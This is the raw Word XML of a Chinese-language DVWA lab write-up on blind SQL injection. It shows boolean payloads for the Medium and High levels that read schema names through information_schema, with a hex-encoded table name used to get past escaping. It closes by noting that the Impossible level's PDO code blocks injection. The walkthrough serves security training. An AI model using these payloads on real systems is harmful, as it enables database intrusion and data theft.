      <w:r w:rsidRPr="00FC5F79">
        <w:t>='</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC5F79">
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC5F79">
        <w:t>' limit 1,1),1,1))=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5F79">
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1123C9A1" w14:textId="49483EEF" w:rsidR="005967C2" w:rsidRDefault="005967C2" w:rsidP="005967C2">
      <w:r w:rsidRPr="00570D81">
        <w:t xml:space="preserve">1' and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00570D81">
        <w:t>ascii(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00570D81">
        <w:t>substr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00570D81">
        <w:t xml:space="preserve">((select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00570D81">
        <w:t>column_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00570D81">
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00570D81">
        <w:t>information_schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00570D81">
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00570D81">
        <w:t>table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00570D81">
        <w:t>='</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00570D81">
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00570D81">
        <w:t xml:space="preserve">' and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00570D81">
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00570D81">
        <w:t>='</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6794">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>0x7573657273</w:t>
      </w:r>
      <w:r w:rsidRPr="00570D81">
        <w:t>' limit 0,1),1,1))=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A33382" w14:textId="44232CA7" w:rsidR="005967C2" w:rsidRPr="005967C2" w:rsidRDefault="005967C2" w:rsidP="005967C2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为对特殊字符进行转义了可以使用16进制来替换使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0CEE6E" w14:textId="77777777" w:rsidR="005967C2" w:rsidRPr="005967C2" w:rsidRDefault="005967C2" w:rsidP="005967C2"/>
    <w:p w14:paraId="0BAC40E0" w14:textId="183B0C28" w:rsidR="005967C2" w:rsidRDefault="005967C2" w:rsidP="00E55608"/>
    <w:p w14:paraId="2C4E1F18" w14:textId="4C0B96E9" w:rsidR="005967C2" w:rsidRDefault="005967C2" w:rsidP="00E55608"/>
    <w:p w14:paraId="73A95583" w14:textId="42427FDF" w:rsidR="005967C2" w:rsidRDefault="005967C2" w:rsidP="00E55608"/>
    <w:p w14:paraId="0C305C77" w14:textId="3657FB87" w:rsidR="005967C2" w:rsidRDefault="005967C2" w:rsidP="00E55608"/>
    <w:p w14:paraId="685929A8" w14:textId="3F9FF40A" w:rsidR="005967C2" w:rsidRDefault="005967C2" w:rsidP="00E55608"/>
    <w:p w14:paraId="7661ED96" w14:textId="25E4780C" w:rsidR="005967C2" w:rsidRDefault="005967C2" w:rsidP="00E55608"/>
    <w:p w14:paraId="48DE3535" w14:textId="0FAC0BB9" w:rsidR="005967C2" w:rsidRDefault="005967C2" w:rsidP="00E55608"/>
    <w:p w14:paraId="564A6709" w14:textId="7F5FB243" w:rsidR="005967C2" w:rsidRDefault="005967C2" w:rsidP="00E55608"/>
    <w:p w14:paraId="1546A70F" w14:textId="5283A185" w:rsidR="005967C2" w:rsidRDefault="005967C2" w:rsidP="00E55608"/>
    <w:p w14:paraId="1ED85890" w14:textId="6CCA5FB5" w:rsidR="005967C2" w:rsidRDefault="005967C2" w:rsidP="00E55608"/>
    <w:p w14:paraId="2AC682F7" w14:textId="1C9AF9E6" w:rsidR="005967C2" w:rsidRDefault="005967C2" w:rsidP="00E55608"/>
    <w:p w14:paraId="0071C0EE" w14:textId="27030BCE" w:rsidR="005967C2" w:rsidRDefault="005967C2" w:rsidP="00E55608"/>
    <w:p w14:paraId="3AE8B128" w14:textId="0BE13047" w:rsidR="005967C2" w:rsidRDefault="005967C2" w:rsidP="00E55608"/>
    <w:p w14:paraId="0BEFF7D6" w14:textId="10037F8C" w:rsidR="005967C2" w:rsidRDefault="005967C2" w:rsidP="00E55608"/>
    <w:p w14:paraId="7140D72D" w14:textId="7FCF7F5F" w:rsidR="005967C2" w:rsidRDefault="005967C2" w:rsidP="005967C2">
      <w:pPr>
        <w:pStyle w:val="1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L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>evel:High</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="56565779" w14:textId="5F911407" w:rsidR="005967C2" w:rsidRDefault="005967C2" w:rsidP="005967C2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5967C2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>可以看到，High级别的代码利用cookie传递参数id，当SQL查询结果为空时，会执行函数sleep(seconds)，目的是为了扰乱基于时间的盲注。同时在 SQL查询语句中添加了LIMIT 1，希望以此控制只输出一个结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBA2A61" w14:textId="15AFB02C" w:rsidR="005967C2" w:rsidRDefault="005967C2" w:rsidP="005967C2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
      </w:pPr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>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r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 xml:space="preserve"> and length(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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>database(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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>))=4 #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C2E78E" w14:textId="499E6013" w:rsidR="005967C2" w:rsidRDefault="005967C2" w:rsidP="005967C2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
      </w:pPr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>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r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 xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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>length(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd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>substr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve">(( select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>information_schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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>=database() limit 0,1),1))=9 #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D21889F" w14:textId="7D0EE804" w:rsidR="005967C2" w:rsidRDefault="005967C2" w:rsidP="005967C2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
      </w:pPr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>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r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 xml:space="preserve"> and (select count(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>column_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve">) from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>information_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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>schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd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 xml:space="preserve"> where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005967C2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>=0x7573657273)=8 #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC08663" w14:textId="718DC7DE" w:rsidR="00B21049" w:rsidRDefault="00B21049" w:rsidP="005967C2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8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8F8F8"/>
        </w:rPr>
        <w:t>之后的步骤跟Low等级一样</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673973C0" w14:textId="221A805E" w:rsidR="00B21049" w:rsidRDefault="00B21049" w:rsidP="005967C2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DBB5409" w14:textId="4693DED2" w:rsidR="00B21049" w:rsidRDefault="00B21049" w:rsidP="005967C2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31D7FA61" w14:textId="09CCFEE6" w:rsidR="00B21049" w:rsidRDefault="00B21049" w:rsidP="00B21049">
      <w:pPr>
        <w:pStyle w:val="1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L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>evel:Impossible</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="185B7E5F" w14:textId="7D288F45" w:rsidR="00B21049" w:rsidRDefault="00B21049" w:rsidP="00B21049">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A03B845" wp14:editId="497DE0DE">
            <wp:extent cx="5274310" cy="24796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361E" w14:textId="5A515282" w:rsidR="00B21049" w:rsidRPr="00B21049" w:rsidRDefault="00B21049" w:rsidP="00B21049">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B21049">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>可以看到，Impossible级别的代码采用了PDO技术，划清了代码与数据的界限，有效防御SQL注入</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00B21049" w:rsidRPr="00B21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750AE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2EB2C336"/>
    <w:lvl w:ilvl="0" w:tplc="24A66B3A">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1、"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="default"/>
        <w:color w:val="2222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950148"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E7321F32"/>
    <w:lvl w:ilvl="0" w:tplc="5A1071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15"/>
    <w:rsid w:val="002371A3"/>
    <w:rsid w:val="00326EBA"/>
    <w:rsid w:val="00477B9B"/>
    <w:rsid w:val="00570D81"/>
    <w:rsid w:val="005967C2"/>
    <w:rsid w:val="005E53CA"/>
    <w:rsid w:val="00733321"/>
    <w:rsid w:val="00775161"/>
    <w:rsid w:val="007C1B38"/>
    <w:rsid w:val="00982E77"/>
    <w:rsid w:val="00A46815"/>
    <w:rsid w:val="00B21049"/>
    <w:rsid w:val="00B23568"/>
    <w:rsid w:val="00B32D82"/>
    <w:rsid w:val="00E136C2"/>
    <w:rsid w:val="00E55608"/>
    <w:rsid w:val="00EB0641"/>
    <w:rsid w:val="00F4545C"/>
    <w:rsid w:val="00F95AF8"/>
    <w:rsid w:val="00FC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4469"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{234AAD28-B53F-40D6-8852-BEB795C6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7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33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3321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733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333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371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8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arkssac sofr</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>arkssac sofr</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-07-30T12:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-07-31T02:36:00Z</dcterms:modified>
</cp:coreProperties>
</file>